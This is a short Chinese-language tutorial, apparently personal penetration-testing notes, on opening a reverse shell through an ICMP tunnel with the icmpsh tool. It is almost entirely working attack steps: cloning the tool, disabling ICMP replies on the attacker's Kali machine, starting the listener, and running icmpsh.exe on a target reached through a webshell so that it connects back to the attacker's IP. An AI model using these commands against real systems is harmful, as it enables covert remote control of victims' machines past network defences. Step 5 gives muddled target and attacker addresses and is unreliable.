利用ICMP隧道反弹shell

 

利用ICMP隧道反弹shell

（1）下载icmpsh：

git clone https://github.com/bdamele/icmpsh.git

 

（2）python安装类库python-impacket

apt-get install python-impacket

 

注：必须下载安装python-impacket，而不是python3-impacket

 

（3）关闭本地系统ICMP应答（即禁ping，开启系统ping将最后的1改为0即可）

sysctl -w net.ipv4.icmp_echo_ignore_all=1

 

 

（4）在kali上开始监听

python icmpsh_m.py 本机ip 目标ip 
即： 
python icmpsh_m.py 192.168.43.204 192.168.43.50

 

 

 

（5）将icmpsh.exe传输到靶机上（尝试用哥斯拉执行命令不成功，换为蚁剑后成功）：

icmpsh.exe -t 目标ip   -t 后面接上攻击机的ip地址 
即： 
icmpsh.exe -t 192.168.43.50   -t 192.168.43.204

 

 

 

 

法二

在目标机器上运行

icmpsh.exe -t 攻击机IP
即： 
icmpsh.exe -t 192.168.43.204